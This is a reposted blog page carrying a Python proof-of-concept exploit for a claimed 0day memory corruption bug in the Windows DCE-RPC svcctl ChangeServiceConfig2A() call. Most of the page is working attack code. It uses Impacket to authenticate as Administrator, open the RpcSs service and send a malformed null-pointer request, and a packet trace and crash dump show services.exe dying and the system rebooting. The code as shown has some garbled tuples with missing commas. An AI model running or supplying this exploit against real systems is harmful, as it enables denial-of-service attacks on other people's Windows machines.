MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit

于 2008-08-25 08:57:00 发布
阅读量1.8k 收藏
点赞数
文章标签: windows structure query access interface credentials
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iiprogram/article/details/2825209
版权
这是一个Python脚本,用于利用MS Windows DCE-RPC svcctl服务的ChangeServiceConfig2A() 0day内存破坏漏洞。脚本详细记录了攻击过程,包括建立会话、连接、创建请求等,并导致目标系统崩溃。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. #!/usr/bin/python
  2. # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit
  3. # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
  4. # Tested on Windows 2000 SP4 Polish (all patches)
  5. #
  6. # Requires..
  7. # - Impacket : http://oss.coresecurity.com/projects/impacket.html
  8. # - PyCrypto : http://www.amk.ca/python/code/crypto.html
  9. #
  10. # Details:..
  11. #
  12. # [exploit] Session Setup AndX Request, User: Administrator -->        [target]
  13. # [exploit] Session Setup AndX Response <--                            [target]
  14. # [exploit] Tree Connect AndX Request -->                              [target]
  15. # [exploit] Tree Connect AndX Response <--                             [target]
  16. # [exploit] NT Create AndX Request, Path: /svcctl -->                  [target]
  17. # [exploit] NT Create AndX Response, Fid: 0x4000 <--                   [target]
  18. # [exploit] DCERPC Bind UUID: SVCCTL -->                               [target]
  19. # [exploit] DCERPC Bind_ack <--                                        [target]
  20. # [exploit] SVCCTL OpenSCManagerW request -->                          [target]
  21. # [exploit] SVCCTL OpenSCManagerW response(handle) <--                 [target]
  22. # [exploit] SVCCTL OpenServiceW request -->                            [target]
  23. # [exploit] SVCCTL OpenServiceW response(handle) <--                   [target]
  24. # [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
  25. # [exploit] DCERPC Fault: status: unknwon(0xc00000fd) <--              [target]
  26. # [exploit] SVCCTL ChangeServiceConfig2A(handle, 1, 1, 0x00000000) --> [target]
  27. # [exploit] SMB Trans Response, Error: Unknown DoS Error <--           [target](crashed)
  28. #
  29. # [Module services]
  30. # Exception C0000005 (ACCESS_VIOLATION reading [00000000])
  31. # -------------------------------------------------------------
  32. # EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
  33. # EBX=004D83C0: 28 83 4D 00 48 84 4D 00-34 84 4D 00 48 61 08 00
  34. # ECX=00000890: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
  35. # EDX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
  36. # ESP=015BF8C0: 34 F9 5B 01 00 00 00 00-00 FB 5B 01 00 00 00 00
  37. # EBP=015BF8F4: 30 F9 5B 01 AD 20 01 01-B8 FB 0D 00 01 00 00 00
  38. # ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
  39. # EDI=01017000: 90 9C 07 00 FF FF FF FF-00 00 00 00 00 00 00 00
  40. # EIP=010108A8: FF 30 68 90 A5 00 01 FF-75 FC E8 CF 1D 00 00 8B
  41. #               --> PUSH DWORD PTR [EAX]
  42. #
  43. # [Process services.exe terminated, system reboot]
  44. #
  45. # Just for fun ;]
  46. ##
  48. from impacket.structure import Structure
  49. from impacket.dcerpc import transport
  50. from impacket import uuid
  51. from random import randint
  52. from time import sleep
  54. host = '192.168.0.1'
  55. username = 'Administrator'
  56. password = 'Administrator_Password'
  58. interface = ('svcctl''367abb81-9844-35f1-ad32-98f038001003''2.0')
  60. stringbinding = "ncacn_np:%(host)s[//pipe//%(pipe)s]"
  61. stringbinding %= {
  62. 'host': host,
  63. 'pipe'interface[0],
  64. }
  66. # random dword
  67. def dword_rand():
  68.    s_dword = 256 ** 4
  69.    return randint(0, s_dword)
  71. # unicode string
  72. def utf16(str):
  73.    return str.encode('utf_16_le')
  75. # MS RPC string
  76. def rpcstr(str, id = 1, unicode_string = 1):
  77.    class foo(Structure):
  78.        alignment = 4
  79.        structure = ()
  81.        if(id == 1):
  82.            structure += (('id''<L')),
  84.        structure += (
  85.            ('max''<L'),
  86.            ('offset''<L=0'),
  87.            ('actual''<L'),
  88.            ('str''%s'),
  89.        )
  91.    query = foo()
  93.    if(id == 1):
  94.        query['id'] = dword_rand()
  96.    query['max'] = len(str)
  97.    query['actual'] = len(str)
  99.    if(unicode_string == 1):
  100.        query['str'] = utf16(str)
  101.    else:
  102.        query['str'] = str
  104.    return query
  106. # MS RPC OpenSCManager
  107. def OpenSCManager(host, access = 1):
  108.    class foo(Structure):
  109.        opnum = 0x0f
  110.        structure = (
  111.            ('str1'':'),
  112.            ('null''<L=0'),
  113.            ('access''<L'),
  114.        )
  116.    query = foo()
  117.    query['str1'] = rpcstr("%s/x00" % (host))
  118.    query['access'] = access
  120.    return query
  122. # MS RPC OpenServiceW
  123. def OpenService(handle, service, access = 1):
  124.    class foo(Structure):
  125.        opnum = 0x10
  126.        structure = (
  127.            ('handle'':'),
  128.            ('str1'':'),
  129.            ('access''<L'),
  130.        )
  132.    query = foo()
  134.    query['handle'] = handle
  135.    query['str1'] = rpcstr("%s/x00" % (service), 0)
  136.    query['access'] = access
  138.    return query
  140. trans = transport.DCERPCTransportFactory(stringbinding)
  141. trans.set_credentials(username, password)
  142. trans.connect()
  143. dce = trans.DCERPC_class(trans)
  144. dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2])))
  146. query = OpenSCManager(host, access = 1)
  147. dce.call(query.opnum, query)
  148. raw = dce.recv()
  149. handle = raw[:20]
  151. query = OpenService(handle, "RpcSs", access = 0xF01FF)
  152. dce.call(query.opnum, query)
  153. raw = dce.recv()
  154. handle = raw[:20]
  156. ##
  157. # ChangeServiceConfig2A() [IDL code generated by mIDA v1.0.7]
  158. #
  159. # typedef struct struct_1 {
  160. #  long elem_1;
  161. #  [switch_is(elem_1)] union union_2 elem_2;
  162. #  } struct_1 ;
  163. #
  164. # typedef [switch_type( unsigned long )] union union_2 {
  165. # [case(1)]  struct struct_3 * elem_1;
  166. # [case(2)]  struct struct_4 * elem_2;
  167. # } union_2;
  168. #
  169. # typedef struct struct_3 {
  170. # [string] char * elem_1;
  171. # } struct_3 ;
  172. #
  173. #
  174. # /* opcode: 0x24, address: 0x0101203B */
  175. #
  176. # long  sub_101203B (
  177. # [in][context_handle] void * arg_1,
  178. # [in] struct struct_1 arg_2
  179. # );
  180. ##
  182. class ChangeServiceConfig2A(Structure):
  183.    opnum = 0x24
  184.    structure = (
  185.        ('context_handle'':'),
  186.        ('switch_is''<L=1'),
  187.        ('case''<L=1'),
  188.        ('struct_3''<L=0x00000000'), # <-- vulnerable argument
  189.      )
  191. query = ChangeServiceConfig2A()
  192. query['context_handle'] = handle
  194. for i in range(0, 2):
  195.    dce.call(query.opnum, query)
  196.    sleep(1)
  198. dce.disconnect()
  200. # EoF

iiprogram
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值